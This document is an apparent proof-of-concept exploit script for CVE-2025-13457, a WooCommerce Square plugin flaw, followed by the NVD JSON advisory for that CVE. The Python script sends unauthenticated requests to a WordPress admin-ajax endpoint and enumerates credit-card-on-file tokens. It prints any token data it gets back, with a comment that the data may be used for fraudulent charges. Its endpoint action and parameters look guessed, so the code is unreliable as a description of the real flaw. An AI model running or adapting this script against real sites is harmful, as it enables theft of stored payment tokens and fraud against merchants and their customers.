CVE-2025-13457

# CVE-2025-13457 WooCommerce Square IDOR PoC # Description: Unauthenticated attackers can access arbitrary Square ccof tokens # CVSS: 7.5 (High) import requests import json TARGET_URL = "https://vulnerable-site.com/wp-admin/admin-ajax.php" def exploit_idor(target_url, ccof_token): """ Exploit the IDOR vulnerability in WooCommerce Square plugin to retrieve credit card on file (ccof) tokens. Args: target_url: Target WordPress site URL ccof_token: Arbitrary Square ccof token to access Returns: Response data containing token information """ headers = { "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest" } # The vulnerable endpoint uses action parameter # Token is passed without proper authorization check data = { "action": "wc_square_get_token", "token_id": ccof_token, "ccof": ccof_token } try: response = requests.post(target_url, data=data, headers=headers, timeout=10) return response.json() if response.status_code == 200 else None except requests.RequestException as e: print(f"Request failed: {e}") return None def main(): # Example ccof tokens - enumerate to find valid ones sample_tokens = [ "ccof_example_token_1", "ccof_example_token_2", "ccof_example_token_3" ] for token in sample_tokens: print(f"[*] Attempting to access token: {token}") result = exploit_idor(TARGET_URL, token) if result: print(f"[!] Successfully retrieved token data: {json.dumps(result, indent=2)}") print(f"[!] This token may be used for fraudulent charges") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-13457", "sourceIdentifier": "[email protected]", "published": "2026-01-10T04:15:59.540", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WooCommerce Square plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.1.1 via the get_token_by_id function due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to expose arbitrary Square \"ccof\" (credit card on file) values and leverage this value to potentially make fraudulent charges on the target site."}, {"lang": "es", "value": "El plugin WooCommerce Square para WordPress es vulnerable a Referencia Directa Insegura a Objeto en todas las versiones hasta e incluyendo la 5.1.1 a través de la función get_token_by_id debido a la falta de validación en una clave controlada por el usuario. Esto hace posible que atacantes no autenticados expongan valores 'ccof' (tarjeta de crédito archivada) arbitrarios de Square y aprovechen este valor para potencialmente realizar cargos fraudulentos en el sitio objetivo."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3415850/woocommerce-square", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7f4f726-7e53-4397-8d8b-7a574326adc6?source=cve", "source": "[email protected]"}]}}